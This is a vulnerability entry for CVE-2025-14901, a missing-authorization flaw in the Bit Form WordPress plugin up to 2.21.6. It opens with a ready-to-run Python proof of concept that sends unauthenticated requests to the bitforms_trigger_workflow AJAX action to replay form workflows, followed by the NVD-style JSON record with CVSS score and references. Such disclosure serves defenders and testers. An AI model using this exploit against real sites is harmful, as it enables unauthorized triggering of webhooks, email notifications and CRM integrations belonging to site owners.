CVE-2025-14901

import requests import json # CVE-2025-14901 PoC - Unauthenticated Workflow Trigger # Bit Form WordPress Plugin < 2.21.7 TARGET_URL = "http://target-wordpress-site.com" # Entry ID and Log ID obtained from legitimate form submission response ENTRY_ID = "123" LOG_ID = "456" def trigger_workflow(): """ Trigger Bit Form workflow without authentication by exploiting the nonce verification logic flaw """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Construct the malicious request data = { "action": "bitforms_trigger_workflow", "entry_id": ENTRY_ID, "log_id": LOG_ID, "form_id": "1" } # Send request as unauthenticated user # The nonce check is bypassed because user is not logged in response = requests.post(endpoint, data=data) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response.status_code == 200 if __name__ == "__main__": trigger_workflow()

{"cve": {"id": "CVE-2025-14901", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.940", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bit Form – Contact Form Plugin plugin for WordPress is vulnerable to unauthorized workflow execution due to missing authorization in the triggerWorkFlow function in all versions up to, and including, 2.21.6. This is due to a logic flaw in the nonce verification where the security check only blocks requests when both the nonce verification fails and the user is logged in. This makes it possible for unauthenticated attackers to replay form workflow executions and trigger all configured integrations including webhooks, email notifications, CRM integrations, and automation platforms via the bitforms_trigger_workflow AJAX action granted they can obtain the entry ID and log IDs from a legitimate form submission response."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L146", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3429172%40bit-form%2Ftrunk&old=3420966%40bit-form%2Ftrunk&sfp_email=&sfph_mail=#file827", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0402e4a6-73ba-49e6-bf80-997ac83b4cfe?source=cve", "source": "[email protected]"}]}}